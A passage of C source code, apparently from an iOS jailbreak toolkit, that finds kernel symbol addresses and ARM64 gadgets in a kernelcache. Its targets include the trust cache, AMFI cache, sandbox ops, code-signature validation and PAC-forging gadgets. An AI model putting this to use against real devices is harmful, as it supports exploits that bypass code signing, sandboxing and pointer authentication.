= sec[j].size;\n }\n }\n }\n else if (!strcmp(seg->segname, \"__PRELINK_TEXT\")) {\n const struct section_64 *sec = (struct section_64 *)(seg + 1);\n for (j = 0; j < seg->nsects; j++) {\n if (!strcmp(sec[j].sectname, \"__text\")) {\n PString_base = sec[j].addr;\n PString_size = sec[j].size;\n }\n }\n }\n else if (!strcmp(seg->segname, \"__LINKEDIT\")) {\n Kernel_delta = seg->vmaddr - min - seg->fileoff;\n }\n }\n else if (cmd->cmd == LC_UNIXTHREAD) {\n uint32_t *ptr = (uint32_t *)(cmd + 1);\n uint32_t flavor = ptr[0];\n struct {\n uint64_t x[29]; /* General purpose registers x0-x28 */\n uint64_t fp; /* Frame pointer x29 */\n uint64_t lr; /* Link register x30 */\n uint64_t sp; /* Stack pointer x31 */\n uint64_t pc; /* Program counter */\n uint32_t cpsr; /* Current program status register */\n } *thread = (void *)(ptr + 2);\n if (flavor == 6) {\n Kernel_entry = thread->pc;\n }\n }\n q = q + cmd->cmdsize;\n }\n \n KernDumpBase = min;\n XNUCore_Base -= KernDumpBase;\n Prelink_Base -= KernDumpBase;\n CString_base -= KernDumpBase;\n PString_base -= KernDumpBase;\n OSLog_base -= KernDumpBase;\n Data_base -= KernDumpBase;\n Data_const_base -= KernDumpBase;\n PPLText_base -= KernDumpBase;\n Kernel_size = max - min;\n \n Kernel = calloc(1, Kernel_size);\n if (!Kernel) {\n close(fd);\n return -1;\n }\n \n q = buf + sizeof(struct mach_header) + is64;\n for (i = 0; i < hdr->ncmds; i++) {\n const struct load_command *cmd = (struct load_command *)q;\n if (cmd->cmd == LC_SEGMENT_64) {\n const struct segment_command_64 *seg = (struct segment_command_64 *)q;\n size_t sz = pread(fd, Kernel + seg->vmaddr - min, seg->filesize, seg->fileoff);\n if (sz != seg->filesize) {\n close(fd);\n free(Kernel);\n return -1;\n }\n if (!Kernel_mh) {\n Kernel_mh = Kernel + seg->vmaddr - min;\n }\n //printf(\"%s\\n\", seg->segname);\n if (!strcmp(seg->segname, \"__LINKEDIT\")) {\n Kernel_delta = seg->vmaddr - min - seg->fileoff;\n }\n }\n q = q + cmd->cmdsize;\n }\n \n Kernel += arch_off;\n \n close(fd);\n \n (void)base;\n return 0;\n}\n\nvoid\nterminatePatchFinder(void)\n{\n Kernel -= arch_off;\n free(Kernel);\n}\n\n/* these operate on VA ******************************************************/\n\n#define INSN_RET 0xD65F03C0, 0xFFFFFFFF\n#define INSN_CALL 0x94000000, 0xFC000000\n#define INSN_B 0x14000000, 0xFC000000\n#define INSN_CBZ 0x34000000, 0xFC000000\n#define INSN_ADRP 0x90000000, 0x9F000000\n#define INSN_TBNZ 0x37000000, 0x7F000000\n\naddr_t\nFind_register_value(addr_t where, int reg)\n{\n addr_t val;\n addr_t bof = 0;\n where -= KernDumpBase;\n if (where > XNUCore_Base) {\n bof = BOF64(Kernel, XNUCore_Base, where);\n if (!bof) {\n bof = XNUCore_Base;\n }\n } else if (where > Prelink_Base) {\n bof = BOF64(Kernel, Prelink_Base, where);\n if (!bof) {\n bof = Prelink_Base;\n }\n }\n val = Calc64(Kernel, bof, where, reg);\n if (!val) {\n return 0;\n }\n return val + KernDumpBase;\n}\n\naddr_t\nFind_reference(addr_t to, int n, int type)\n{\n addr_t ref, end;\n addr_t base;\n addr_t size;\n \n base = XNUCore_Base;\n size = XNUCore_Size;\n \n if (type == 1) {\n base = Prelink_Base;\n size = Prelink_Size;\n }\n \n if (type == 4) {\n base = PPLText_base;\n size = PPLText_size;\n }\n \n if (n <= 0) {\n n = 1;\n }\n end = base + size;\n to -= KernDumpBase;\n do {\n ref = XREF64(Kernel, base, end, to);\n if (!ref) {\n return 0;\n }\n base = ref + 4;\n } while (--n > 0);\n return ref + KernDumpBase;\n}\n\n\naddr_t\nFind_strref(const char *string, int n, int type, bool exactMatch)\n{\n uint8_t *str;\n addr_t base, size;\n \n if (type == 1) {\n base = PString_base;\n size = PString_size;\n }\n else if (type == 2) {\n base = OSLog_base;\n size = OSLog_size;\n }\n else if (type == 3) {\n base = Data_base;\n size = Data_size;\n }\n else {\n base = CString_base;\n size = CString_size;\n }\n \n str = Boyermoore_horspool_memmem(Kernel + base, size, (uint8_t *)string, strlen(string));\n \n if (exactMatch) {\n while (strcmp((char *)str, string)) {\n base += ((uint64_t)str - (uint64_t)Kernel - (uint64_t)base) + 1;\n size -= strlen((char *)str) + 1;\n str = Boyermoore_horspool_memmem(Kernel + base, size, (uint8_t *)string, strlen(string));\n }\n }\n \n if (!str) {\n return 0;\n }\n return Find_reference(str - Kernel + KernDumpBase, n, type);\n}\n\n/****** fun *******/\n\naddr_t Find_add_x0_x0_0x40_ret(void) {\n addr_t off;\n uint32_t *k;\n k = (uint32_t *)(Kernel + XNUCore_Base);\n for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {\n if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {\n return off + XNUCore_Base + KernDumpBase + kernel_slide;\n }\n }\n k = (uint32_t *)(Kernel + Prelink_Base);\n for (off = 0; off < Prelink_Size - 4; off += 4, k++) {\n if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {\n return off + Prelink_Base + KernDumpBase + kernel_slide;\n }\n }\n return 0;\n}\n\nuint64_t Find_allproc(void) {\n // Find the first reference to the string\n addr_t ref = Find_strref(\"\\\"pgrp_add : pgrp is dead adding process\\\"\", 1, 0, false);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n uint32_t op_before = *(uint32_t *)(Kernel + ref - 8);\n if ((op_before & 0xFC000000) == 0x14000000) {\n ref = Find_reference(ref - 4 + KernDumpBase, 1, 0);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n }\n \n uint64_t start = BOF64(Kernel, XNUCore_Base, ref);\n if (!start) {\n return 0;\n }\n \n // Find AND W8, W8, #0xFFFFDFFF - it's a pretty distinct instruction\n addr_t weird_instruction = 0;\n for (int i = 4; i < 5*0x100; i+=4) {\n uint32_t op = *(uint32_t *)(Kernel + ref + i);\n if (op == 0x12127908) {\n weird_instruction = ref+i;\n break;\n }\n }\n if (!weird_instruction) {\n return 0;\n }\n \n uint64_t val = Calc64(Kernel, start, weird_instruction - 8, 8);\n if (!val) {\n printf(\"Failed to calculate x8\");\n return 0;\n }\n \n return val + KernDumpBase + kernel_slide;\n}\n\nuint64_t Find_copyout(void) {\n // Find the first reference to the string\n addr_t ref = Find_strref(\"\\\"%s(%p, %p, %lu) - transfer too large\\\"\", 2, 0, false);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n uint64_t start = 0;\n for (int i = 4; i < 0x100*4; i+=4) {\n uint32_t op = *(uint32_t*)(Kernel+ref-i);\n if (op == 0xd10143ff) { // SUB SP, SP, #0x50\n start = ref-i;\n break;\n }\n }\n if (!start) {\n return 0;\n }\n \n return start + KernDumpBase + kernel_slide;\n}\n\nuint64_t Find_bzero(void) {\n // Just find SYS #3, c7, c4, #1, X3, then get the start of that function\n addr_t off;\n uint32_t *k;\n k = (uint32_t *)(Kernel + XNUCore_Base);\n for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {\n if (k[0] == 0xd50b7423) {\n off += XNUCore_Base;\n break;\n }\n }\n \n uint64_t start = BOF64(Kernel, XNUCore_Base, off);\n if (!start) {\n return 0;\n }\n \n return start + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_bcopy(void) {\n // Jumps straight into memmove after switching x0 and x1 around\n // Guess we just find the switch and that's it\n addr_t off;\n uint32_t *k;\n k = (uint32_t *)(Kernel + XNUCore_Base);\n for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {\n if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) {\n return off + XNUCore_Base + KernDumpBase + kernel_slide;\n }\n }\n k = (uint32_t *)(Kernel + Prelink_Base);\n for (off = 0; off < Prelink_Size - 4; off += 4, k++) {\n if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) {\n return off + Prelink_Base + KernDumpBase + kernel_slide;\n }\n }\n return 0;\n}\n\nuint64_t Find_rootvnode(void) {\n // Find the first reference to the string\n addr_t ref = Find_strref(\"/var/run/.vfs_rsrc_streams_%p%x\", 1, 0, false);\n \n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n uint64_t start = BOF64(Kernel, XNUCore_Base, ref);\n if (!start) {\n return 0;\n }\n \n // Find MOV X9, #0x2000000000 - it's a pretty distinct instruction\n addr_t weird_instruction = 0;\n for (int i = 4; i < 4*0x100; i+=4) {\n uint32_t op = *(uint32_t *)(Kernel + ref - i);\n if (op == 0xB25B03E9) {\n weird_instruction = ref-i;\n break;\n }\n }\n if (!weird_instruction) {\n ref = Find_strref(\"/var/run/.vfs_rsrc_streams_%p%x\", 2, 0, false);\n \n if (!ref) {\n return 0;\n }\n \n ref -= KernDumpBase;\n \n start = BOF64(Kernel, XNUCore_Base, ref);\n if (!start) {\n return 0;\n }\n \n for (int i = 4; i < 4*0x100; i+=4) {\n uint32_t op = *(uint32_t *)(Kernel + ref - i);\n if (op == 0xB25B03E9) {\n weird_instruction = ref-i;\n break;\n }\n }\n if (!weird_instruction) {\n return 0;\n }\n }\n \n uint64_t val = Calc64(Kernel, start, weird_instruction, 8);\n if (!val) {\n return 0;\n }\n \n return val + KernDumpBase + kernel_slide;\n}\n\n\naddr_t Find_vnode_lookup() {\n addr_t ref, call, bof, func;\n ref = Find_strref(\"/private/var/mobile\", 0, 0, false);\n if (!ref) {\n return 0;\n }\n \n ref -= KernDumpBase;\n bof = BOF64(Kernel, XNUCore_Base, ref);\n if (!bof) {\n return 0;\n }\n \n call = Step64(Kernel, ref, ref - bof, INSN_CALL);\n if (!call) {\n ref = Find_strref(\"/private/var/mobile\", 2, 0, false);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n bof = BOF64(Kernel, XNUCore_Base, ref);\n if (!bof) {\n return 0;\n }\n \n call = Step64(Kernel, ref, ref - bof, INSN_CALL);\n if (!call) {\n return 0;\n }\n }\n \n call += 4;\n call = Step64(Kernel, call, call - bof, INSN_CALL);\n if (!call) {\n return 0;\n }\n \n call += 4;\n call = Step64(Kernel, call, call - bof, INSN_CALL);\n if (!call) {\n return 0;\n }\n \n func = Follow_call64(Kernel, call);\n if (!func) {\n return 0;\n }\n \n return func + KernDumpBase + kernel_slide;\n}\n\n// this is so bad ik\naddr_t Find_vfs_context_current(void) {\n uint64_t string = Find_strref(\"apfs_vnop_renamex\", 5, 0, true);\n if (!string) {\n return 0;\n }\n string -= KernDumpBase;\n \n uint64_t call = Step64_back(Kernel, string, 100, INSN_CALL);\n if (!call) {\n return 0;\n }\n \n uint64_t call2 = Step64_back(Kernel, call - 4, 100, INSN_CALL);\n if (!call2) {\n return 0;\n }\n \n uint64_t func = Follow_call64(Kernel, call2);\n if (!func) {\n return 0;\n }\n return func + KernDumpBase + kernel_slide;\n}\n\n// strictly for new kernelcache formats. on older ones find string in prelink section instead\naddr_t Find_vnode_put(void) {\n uint64_t str = Find_strref(\"%s:%d: UNSET root_to_xid - on next boot, volume will root to liv\", 1, 0, false);\n if (!str) {\n return 0;\n }\n str -= KernDumpBase;\n \n uint64_t call = Step64(Kernel, str, 100, INSN_CALL);\n if (!call) {\n return 0;\n }\n \n uint64_t call2 = Step64(Kernel, call + 4, 100, INSN_CALL);\n if (!call2) {\n return 0;\n }\n \n uint64_t call3 = Step64(Kernel, call2 + 4, 100, INSN_CALL);\n if (!call3) {\n return 0;\n }\n \n uint64_t func = Follow_call64(Kernel, call3);\n if (!func) {\n return 0;\n }\n return func + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_trustcache(void) {\n addr_t call, func, ref;\n \n ref = Find_strref(\"%s: only allowed process can check the trust cache\", 1, 1, false);\n if (!ref) {\n ref = Find_strref(\"%s: only allowed process can check the trust cache\", 1, 0, false);\n if (!ref) {\n return 0;\n }\n }\n ref -= KernDumpBase;\n \n call = Step64_back(Kernel, ref, 44, INSN_CALL);\n if (!call) {\n return 0;\n }\n \n func = Follow_call64(Kernel, call);\n if (!func) {\n return 0;\n }\n \n call = Step64(Kernel, func, 32, INSN_CALL);\n if (!call) {\n return 0;\n }\n \n func = Follow_call64(Kernel, call);\n if (!func) {\n return 0;\n }\n \n call = Step64(Kernel, func, 32, INSN_CALL);\n if (!call) {\n return 0;\n }\n \n call = Step64(Kernel, call + 4, 32, INSN_CALL);\n if (!call) {\n return 0;\n }\n \n func = Follow_call64(Kernel, call);\n if (!func) {\n return 0;\n }\n \n call = Step64(Kernel, func, 48, INSN_CALL);\n if (!call) {\n return 0;\n }\n \n uint64_t val = Calc64(Kernel, call, call + 24, 21);\n if (!val) {\n // iOS 12\n \n if (PPLText_size) {\n // A12\n \n ref = Find_strref(\"\\\"loadable trust cache buffer too small (%ld) for entries claimed (%d)\\\"\", 1, 4, false);\n if (!ref) {\n return 0;\n }\n \n ref -= KernDumpBase;\n \n val = Calc64(Kernel, ref-32*4, ref-24*4, 8);\n if (!val) {\n return 0;\n }\n \n return val + KernDumpBase + kernel_slide;\n }\n else {\n ref = Find_strref(\"\\\"loadable trust cache buffer too small (%ld) for entries claimed (%d)\\\"\", 1, 0, false);\n }\n \n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n val = Calc64(Kernel, ref-12*4, ref-12*4+12, 8);\n if (!val) {\n return 0;\n }\n return val + KernDumpBase + kernel_slide;\n }\n return val + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_pmap_load_trust_cache_ppl() {\n uint64_t ref = Find_strref(\"%s: trust cache already loaded, ignoring\", 2, 0, false);\n if (!ref) {\n ref = Find_strref(\"%s: trust cache already loaded, ignoring\", 1, 0, false);\n if (!ref) {\n return 0;\n }\n }\n ref -= KernDumpBase;\n \n uint64_t func = Step64_back(Kernel, ref, 200, INSN_CALL);\n if (!func) {\n return 0;\n }\n \n func -= 4;\n \n func = Step64_back(Kernel, func, 200, INSN_CALL);\n if (!func) {\n return 0;\n }\n \n func = Follow_call64(Kernel, func);\n if (!func) {\n return 0;\n }\n \n return func + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_amficache() {\n uint64_t cbz, call, func, val;\n uint64_t ref = Find_strref(\"amfi_prevent_old_entitled_platform_binaries\", 1, 1, false);\n if (!ref) {\n // iOS 11\n ref = Find_strref(\"com.apple.MobileFileIntegrity\", 0, 1, false);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n call = Step64(Kernel, ref, 64, INSN_CALL);\n if (!call) {\n return 0;\n }\n call = Step64(Kernel, call + 4, 64, INSN_CALL);\n goto okay;\n }\n ref -= KernDumpBase;\n cbz = Step64(Kernel, ref, 32, INSN_CBZ);\n if (!cbz) {\n return 0;\n }\n call = Step64(Kernel, Follow_cbz(Kernel, cbz), 4, INSN_CALL);\nokay:\n if (!call) {\n return 0;\n }\n func = Follow_call64(Kernel, call);\n if (!func) {\n return 0;\n }\n val = Calc64(Kernel, func, func + 16, 8);\n if (!val) {\n ref = Find_strref(\"%s: only allowed process can check the trust cache\", 1, 1, false); // Trying to find AppleMobileFileIntegrityUserClient::isCdhashInTrustCache\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n call = Step64_back(Kernel, ref, 11*4, INSN_CALL);\n if (!call) {\n return 0;\n }\n func = Follow_call64(Kernel, call);\n if (!func) {\n return 0;\n }\n call = Step64(Kernel, func, 8*4, INSN_CALL);\n if (!call) {\n return 0;\n }\n func = Follow_call64(Kernel, call);\n if (!func) {\n return 0;\n }\n call = Step64(Kernel, func, 8*4, INSN_CALL);\n if (!call) {\n return 0;\n }\n call = Step64(Kernel, call+4, 8*4, INSN_CALL);\n if (!call) {\n return 0;\n }\n func = Follow_call64(Kernel, call);\n if (!func) {\n return 0;\n }\n call = Step64(Kernel, func, 12*4, INSN_CALL);\n if (!call) {\n return 0;\n }\n \n val = Calc64(Kernel, call, call + 6*4, 21);\n }\n return val + KernDumpBase + kernel_slide;\n}\n\n\naddr_t Find_zone_map_ref(void) {\n // \\\"Nothing being freed to the zone_map. start = end = %p\\\\n\\\"\n uint64_t val = KernDumpBase;\n \n addr_t ref = Find_strref(\"\\\"Nothing being freed to the zone_map. start = end = %p\\\\n\\\"\", 1, 0, false);\n ref -= KernDumpBase;\n \n // skip add & adrp for panic str\n ref -= 8;\n \n // adrp xX, #_zone_map@PAGE\n ref = Step64_back(Kernel, ref, 30, INSN_ADRP);\n \n uint32_t *insn = (uint32_t*)(Kernel+ref);\n // get pc\n val += ((uint8_t*)(insn) - Kernel) & ~0xfff;\n uint8_t xm = *insn & 0x1f;\n \n // don't ask, I wrote this at 5am\n val += (*insn<<9 & 0x1ffffc000) | (*insn>>17 & 0x3000);\n \n // ldr x, [xX, #_zone_map@PAGEOFF]\n ++insn;\n if ((*insn & 0xF9C00000) != 0xF9400000) {\n return 0;\n }\n \n // xd == xX, xn == xX,\n if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm) {\n return 0;\n }\n \n val += ((*insn >> 10) & 0xFFF) << 3;\n \n return val + kernel_slide;\n}\n\naddr_t Find_OSBoolean_True() {\n addr_t val;\n addr_t ref = Find_strref(\"Delay Autounload\", 0, 0, false);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n addr_t weird_instruction = 0;\n for (int i = 4; i < 4*0x100; i+=4) {\n uint32_t op = *(uint32_t *)(Kernel + ref + i);\n if (op == 0x320003E0) {\n weird_instruction = ref+i;\n break;\n }\n }\n if (!weird_instruction) {\n ref = Find_strref(\"Delay Autounload\", 2, 0, false);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n for (int i = 4; i < 4*0x100; i+=4) {\n uint32_t op = *(uint32_t *)(Kernel + ref + i);\n if (op == 0x320003E0) {\n weird_instruction = ref+i;\n break;\n }\n }\n if (!weird_instruction) {\n return 0;\n }\n }\n \n val = Calc64(Kernel, ref, weird_instruction, 8);\n if (!val) {\n return 0;\n }\n \n return rk64(val + KernDumpBase + kernel_slide);\n}\n\naddr_t Find_OSBoolean_False() {\n return Find_OSBoolean_True()+8;\n}\n\naddr_t Find_osunserializexml() {\n addr_t ref = Find_strref(\"OSUnserializeXML: %s near line %d\\n\", 1, 0, false);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n uint64_t start = BOF64(Kernel, XNUCore_Base, ref);\n if (!start) {\n return 0;\n }\n \n return start + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_smalloc() {\n addr_t ref = Find_strref(\"sandbox memory allocation failure\", 1, 1, false);\n if (!ref) {\n ref = Find_strref(\"sandbox memory allocation failure\", 1, 2, false);\n if (!ref) {\n return 0;\n }\n }\n ref -= KernDumpBase;\n \n uint64_t start = BOF64(Kernel, Prelink_Base, ref);\n if (!start) {\n start = BOF64(Kernel, XNUCore_Base, ref);\n if (!start) {\n return 0;\n }\n }\n \n return start + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_sbops() {\n addr_t off, what;\n uint8_t *str = Boyermoore_horspool_memmem(Kernel + PString_base, PString_size, (uint8_t *)\"Seatbelt sandbox policy\", sizeof(\"Seatbelt sandbox policy\") - 1);\n if (!str) {\n return 0;\n }\n what = str - Kernel + KernDumpBase;\n for (off = 0; off < Kernel_size - Prelink_Base; off += 8) {\n if (*(uint64_t *)(Kernel + Prelink_Base + off) == what) {\n return *(uint64_t *)(Kernel + Prelink_Base + off + 24) + kernel_slide;\n }\n }\n return 0;\n}\n\nuint64_t Find_bootargs(void) {\n \n /*\n ADRP X8, #_PE_state@PAGE\n ADD X8, X8, #_PE_state@PAGEOFF\n LDR X8, [X8,#(PE_state__boot_args - 0xFFFFFFF0078BF098)]\n ADD X8, X8, #0x6C\n STR X8, [SP,#0x550+var_550]\n ADRP X0, #aBsdInitCannotF@PAGE ; \"\\\"bsd_init: cannot find root vnode: %s\"...\n ADD X0, X0, #aBsdInitCannotF@PAGEOFF ; \"\\\"bsd_init: cannot find root vnode: %s\"...\n BL _panic\n */\n \n addr_t ref = Find_strref(\"\\\"bsd_init: cannot find root vnode: %s\\\"\", 1, 0, false);\n \n if (ref == 0) {\n return 0;\n }\n \n ref -= KernDumpBase;\n // skip add & adrp for panic str\n ref -= 8;\n uint32_t *insn = (uint32_t*)(Kernel+ref);\n \n // skip str\n --insn;\n // add xX, xX, #cmdline_offset\n uint8_t xm = *insn&0x1f;\n if (((*insn>>5)&0x1f) != xm || ((*insn>>22)&3) != 0) {\n return 0;\n }\n \n //cmdline_offset = (*insn>>10) & 0xfff;\n \n uint64_t val = KernDumpBase;\n \n --insn;\n // ldr xX, [xX, #(PE_state__boot_args - PE_state)]\n if ((*insn & 0xF9C00000) != 0xF9400000) {\n return 0;\n }\n // xd == xX, xn == xX,\n if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm) {\n return 0;\n }\n \n val += ((*insn >> 10) & 0xFFF) << 3;\n \n --insn;\n // add xX, xX, #_PE_state@PAGEOFF\n if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm || ((*insn>>22)&3) != 0) {\n return 0;\n }\n \n val += (*insn>>10) & 0xfff;\n \n --insn;\n if ((*insn & 0x1f) != xm) {\n return 0;\n }\n \n // pc\n val += ((uint8_t*)(insn) - Kernel) & ~0xfff;\n \n // don't ask, I wrote this at 5am\n val += (*insn<<9 & 0x1ffffc000) | (*insn>>17 & 0x3000);\n \n return val + kernel_slide;\n}\n\naddr_t Find_l2tp_domain_module_start() {\n uint64_t string = (uint64_t)Boyermoore_horspool_memmem(Kernel + Data_base, Data_size, (const unsigned char *)\"com.apple.driver.AppleSynopsysOTGDevice\", strlen(\"com.apple.driver.AppleSynopsysOTGDevice\")) - (uint64_t)Kernel;\n if (!string) {\n return 0;\n }\n \n // uint64_t val = *(uint64_t*)(string + (uint64_t)Kernel - 0x20);\n // not sure if this is constant among all devices if (val == 0x8010000001821088) return string + KernDumpBase - 0x20;\n // return 0;\n \n return string + KernDumpBase - 0x20 + kernel_slide;\n}\n\naddr_t Find_l2tp_domain_module_stop() {\n uint64_t string = (uint64_t)Boyermoore_horspool_memmem(Kernel + Data_base, Data_size, (const unsigned char *)\"com.apple.driver.AppleSynopsysOTGDevice\", strlen(\"com.apple.driver.AppleSynopsysOTGDevice\")) - (uint64_t)Kernel;\n if (!string) {\n return 0;\n }\n \n // uint64_t val = *(uint64_t*)(string + (uint64_t)Kernel - 0x20);\n // not sure if this is constant among all devices if (val == 0x8178000001821180) return string + KernDumpBase - 0x18;\n // return 0;\n \n return string + KernDumpBase - 0x18 + kernel_slide;\n}\n\naddr_t Find_l2tp_domain_inited() {\n uint64_t ref = Find_strref(\"L2TP domain init\\n\", 1, 0, true);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n uint64_t addr = Calc64(Kernel, ref, ref + 32, 8);\n if (!addr) {\n return 0;\n }\n \n return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_sysctl_net_ppp_l2tp() {\n uint64_t ref = Find_strref(\"L2TP domain terminate : PF_PPP domain does not exist...\\n\", 1, 0, true);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n ref += 4;\n \n uint64_t addr = Calc64(Kernel, ref, ref + 28, 0);\n if (!addr) {\n return 0;\n }\n \n return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_sysctl_unregister_oid() {\n uint64_t ref = Find_strref(\"L2TP domain terminate : PF_PPP domain does not exist...\\n\", 1, 0, true);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n uint64_t addr = Step64(Kernel, ref, 28, INSN_CALL);\n if (!addr) {\n return 0;\n }\n \n addr += 4;\n addr = Step64(Kernel, addr, 28, INSN_CALL);\n if (!addr) {\n return 0;\n }\n \n uint64_t call = Follow_call64(Kernel, addr);\n if (!call) {\n return 0;\n }\n return call + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_mov_x0_x4__br_x5() {\n uint32_t bytes[] = {\n 0xaa0403e0, // mov x0, x4\n 0xd61f00a0 // br x5\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n \n return addr - (uint64_t)Kernel + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_mov_x9_x0__br_x1() {\n uint32_t bytes[] = {\n 0xaa0003e9, // mov x9, x0\n 0xd61f0020 // br x1\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n \n return addr - (uint64_t)Kernel + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_mov_x10_x3__br_x6() {\n uint32_t bytes[] = {\n 0xaa0303ea, // mov x10, x3\n 0xd61f00c0 // br x6\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n \n return addr - (uint64_t)Kernel + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kernel_forge_pacia_gadget() {\n \n uint32_t bytes[] = {\n 0xdac10149, // paci\n 0xf9007849 // str x9, [x2, #240]\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n \n return addr - (uint64_t)Kernel + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kernel_forge_pacda_gadget() {\n \n uint32_t bytes[] = {\n 0xdac10949, // pacd x9\n 0xf9007449 // str x9, [x2, #232]\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n \n return addr - (uint64_t)Kernel + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_IOUserClient_vtable() {\n uint64_t ref1 = Find_strref(\"IOUserClient\", 2, 0, true);\n if (!ref1) {\n return 0;\n }\n ref1 -= KernDumpBase;\n \n uint64_t ref2 = Find_strref(\"IOUserClient\", 3, 0, true);\n if (!ref2) {\n return 0;\n }\n ref2 -= KernDumpBase;\n \n uint64_t func2 = BOF64(Kernel, XNUCore_Base, ref2);\n if (!func2) {\n return 0;\n }\n \n uint64_t vtable = Calc64(Kernel, ref1, func2, 8);\n if (!vtable) {\n return 0;\n }\n \n //vtable -= 0x10;\n \n return vtable + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_IORegistryEntry__getRegistryEntryID() {\n \n uint32_t bytes[] = {\n 0xf9400808, // ldr x8, [x0, #0x10]\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n \n // basically just look the instructions\n // can't find a better way\n // this was not done like the previous gadgets because an address is being used, which won't be the same between devices so can't be hardcoded and i gotta use masks\n \n // cbz x8, SOME_ADDRESS <= where we do masking (((*(uint32_t *)(addr + 4)) & 0xFC000000) != 0xb4000000)\n // ldr x0, [x8, #8] <= 2nd part of 0xd65f03c0f9400500\n // ret <= 1st part of 0xd65f03c0f9400500\n \n while ((((*(uint32_t *)(addr + 4)) & 0xFC000000) != 0xb4000000) || (*(uint64_t*)(addr + 8) != 0xd65f03c0f9400500)) {\n addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)(addr + 4), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n }\n \n return addr + KernDumpBase - (uint64_t)Kernel + kernel_slide;\n}\n\naddr_t Find_cs_gen_count() {\n uint64_t ref = Find_strref(\"CS Platform Exec Logging: Executing platform signed binary '%s'\", 1, 2, false);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n uint64_t addr = Step64(Kernel, ref, 200, INSN_ADRP);\n if (!addr) {\n return 0;\n }\n \n addr = Calc64(Kernel, addr, addr + 12, 25);\n if (!addr) {\n return 0;\n }\n \n return addr + KernDumpBase + kernel_slide;\n}\n\n\naddr_t Find_cs_validate_csblob() {\n \n uint32_t bytes[] = {\n 0x52818049, // mov w9, #0xC02\n 0x72bf5bc9, // movk w9, #0xfade, lsl#16\n 0x6b09011f // cmp w8, w9\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n \n addr -= (uint64_t)Kernel;\n addr = BOF64(Kernel, XNUCore_Base, addr);\n if (!addr) {\n return 0;\n }\n \n return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kalloc_canblock() {\n \n uint32_t bytes[] = {\n 0xaa0003f3, // mov x19, x0\n 0xf9400274, // ldr x20, [x19]\n 0xf11fbe9f // cmp x20, #0x7ef\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n addr -= (uint64_t)Kernel;\n \n addr = BOF64(Kernel, XNUCore_Base, addr);\n if (!addr) {\n return 0;\n }\n \n return addr + KernDumpBase + 